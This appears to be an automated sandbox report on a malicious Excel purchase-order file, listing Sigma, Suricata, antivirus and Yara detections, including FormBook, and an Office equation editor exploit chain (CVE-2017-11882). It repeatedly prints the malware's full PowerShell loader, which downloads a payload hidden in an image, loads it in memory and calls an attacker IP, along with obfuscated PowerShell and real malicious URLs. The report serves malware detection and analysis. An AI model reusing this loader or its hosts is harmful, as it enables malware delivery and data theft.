            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GRW/341/33.051.012.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GRW/341/33.051.012.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ?
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\mekissedbutterburnwithstrong.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\mekissedbutterburnwithstrong.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2456, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\mekissedbutterburnwithstrong.vBS" , ProcessId: 3104, ProcessName: wscript.exe
            Sigma detected: Modification of IE Registry Settings
            Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 2456, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ?
            Sigma detected: Office Macro File Creation
            Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 2408, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
            Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3148, TargetFilename: C:\Users\user\AppData\Local\Temp\lkdpr2vr.wxa.ps1

            Data Obfuscation

            barindex
            Sigma detected: Powershell download and load assembly
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GRW/341/33.051.012.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GRW/341/33.051.012.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ?

            Suricata Signatures

            Timestamp:2024-08-16T09:32:48.120716+0200
            SID:2049038
            Severity:1
            Source Port:443
            Destination Port:49171
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpgAvira URL Cloud: Label: malware
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{5C909DDB-F3E7-47E0-A0E1-100901A3378E}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethesmoothofbutterburnwhichtasteofentirethingstounderrstnadwellthebuttersmoothchocolateburneatwellwith_______sweetandhotburn[1].docAvira: detection malicious, Label: HEUR/Rtf.Malformed
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1288490C.docAvira: detection malicious, Label: HEUR/Rtf.Malformed
            Multi AV Scanner detection for domain / URL
            Source: http://192.210.150.33/143/mekissedbutterburnwithstronglips.tIFjVirustotal: Detection: 9%Perma Link
            Source: https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpgVirustotal: Detection: 10%Perma Link
            Source: http://192.210.150.33/143/WRG.txtVirustotal: Detection: 9%Perma Link
            Source: http://192.210.150.33/143/uc/seethesmoothofbutterburnwhichtasteofentirethingstounderrstnadwellthebuttersmoothchocolateburneatwellwith_______sweetandhotburn.docVirustotal: Detection: 9%Perma Link
            Multi AV Scanner detection for submitted file
            Source: Mac Purchase Order PO102935.xlsVirustotal: Detection: 9%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000B.00000002.466471419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.521653656.0000000000100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.620757047.00000000000F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.620790814.00000000002C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.620825188.0000000000330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.466373539.00000000003A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.469509226.00000000025A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Machine Learning detection for sample
            Source: Mac Purchase Order PO102935.xlsJoe Sandbox ML: detected

            Exploits

            barindex
            Office equation editor establishes network connection
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 192.210.150.33 Port: 80Jump to behavior
            Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exeJump to behavior
            Source: ~WRF{5C909DDB-F3E7-47E0-A0E1-100901A3378E}.tmp.3.drStream path '_1785284311/\x1CompObj' : ...................F....Microsoft Equation 3.0....
            Source: ~WRF{5C909DDB-F3E7-47E0-A0E1-100901A3378E}.tmp.3.drStream path '_1785284315/\x1CompObj' : ...................F....Microsoft Equation 3.0....
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49166 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 207.241.232.154:443 -> 192.168.2.22:49171 version: TLS 1.0
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49161 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49163 version: TLS 1.2
            Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb\ source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: RegAsm.pdb source: find.exe, 0000000D.00000002.621202000.000000000278C000.00000004.10000000.00040000.00000000.sdmp, find.exe, 0000000D.00000002.620947372.000000000056B000.00000004.00000020.00020000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000000.480001579.0000000002B6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.521681505.000000000084C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, find.exe, 0000000D.00000003.466622226.0000000001EC0000.00000004.00000020.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621026297.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, find.exe, 0000000D.00000003.466090226.0000000001D60000.00000004.00000020.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621026297.0000000002050000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: RegAsm.pdb4 source: find.exe, 0000000D.00000002.621202000.000000000278C000.00000004.10000000.00040000.00000000.sdmp, find.exe, 0000000D.00000002.620947372.000000000056B000.00000004.00000020.00020000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000000.480001579.0000000002B6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.521681505.000000000084C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
